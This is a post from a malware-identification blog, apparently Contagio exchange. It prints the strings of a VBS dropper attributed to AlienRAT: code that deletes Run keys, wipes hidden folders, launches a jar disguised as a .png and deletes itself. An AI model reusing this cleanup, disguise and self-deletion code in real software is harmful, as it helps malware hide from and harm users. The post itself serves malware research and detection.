About contagio exchange

Contagio exchange was created to absorb malware samples shared by readers of Contagio. This is meant to be a community-driven malware collection.
Edit Aug 2013 - The community is busy and Mila too so this was not a very active site (my fault probably) so I will be just dumping malware strings here - it often helps in malware identification and googling is the best way.
With just strings, not exactly a fun blog to read but might become a useful resource over time.
I will not be posting samples here, just md5. You can find the corresponding samples on contagio or ping me if you can't find
M
P.S. Robot pictures delivered by Robohash.com (generated from file hashes)

Monday, November 17, 2014

OiuFr7LcfXq1847924646026958055.vbs - AlienRAT dropped VBS

Note: Laura is the user name on the sandbox


File: OiuFr7LcfXq1847924646026958055.vbs
MD5:  9e1ede0dedadb7af34c0222ada2d58c9
Size: 1542



Ascii Strings:
---------------------------------------------------------------------------
on error resume next
Wscript.sleep 5000
Dim oShell
Dim sFunction
Set oShell = WScript.CreateObject ("WSCript.shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
oShell.regdelete("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\GKXeW0Yke7")
oShell.regdelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\GKXeW0Yke7")
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\Application Data\9bor9J6cRd\*.*""",0
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\Application Data\9bor9J6cRd""",0
objFSO.DeleteFile("C:\Documents and Settings\Laura\Application Data\9bor9J6cRd\*"),TRUE
objFSO.DeleteFolder("C:\Documents and Settings\Laura\Application Data\9bor9J6cRd"),TRUE
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\.m4w6OAI02f\*.*""",0
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\.m4w6OAI02f""",0
Wscript.sleep 5000
objFSO.DeleteFile("C:\Documents and Settings\Laura\.m4w6OAI02f\*"),TRUE
objFSO.DeleteFolder("C:\Documents and Settings\Laura\.m4w6OAI02f"),TRUE
oShell.run """C:\Program Files\Java\jre7\bin\javaw.exe"" -jar ""C:\DOCUME~1\Laura\LOCALS~1\Temp\iWimMQLgpsT2624529381479181764.png"""
Wscript.sleep 3000
objFSO.DeleteFile("C:\DOCUME~1\Laura\LOCALS~1\Temp\iWimMQLgpsT2624529381479181764.png\*"),TRUE
Set oShell = Nothing
Set objFSO = Nothing
sFunction = "WScript.Sleep 3000: Set Melt = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & "): Melt.DeleteFile " & Chr(34) & WScript.ScriptFullName & Chr(34)
Execute(sFunction)

Unicode Strings:
---------------------------------------------------------------------------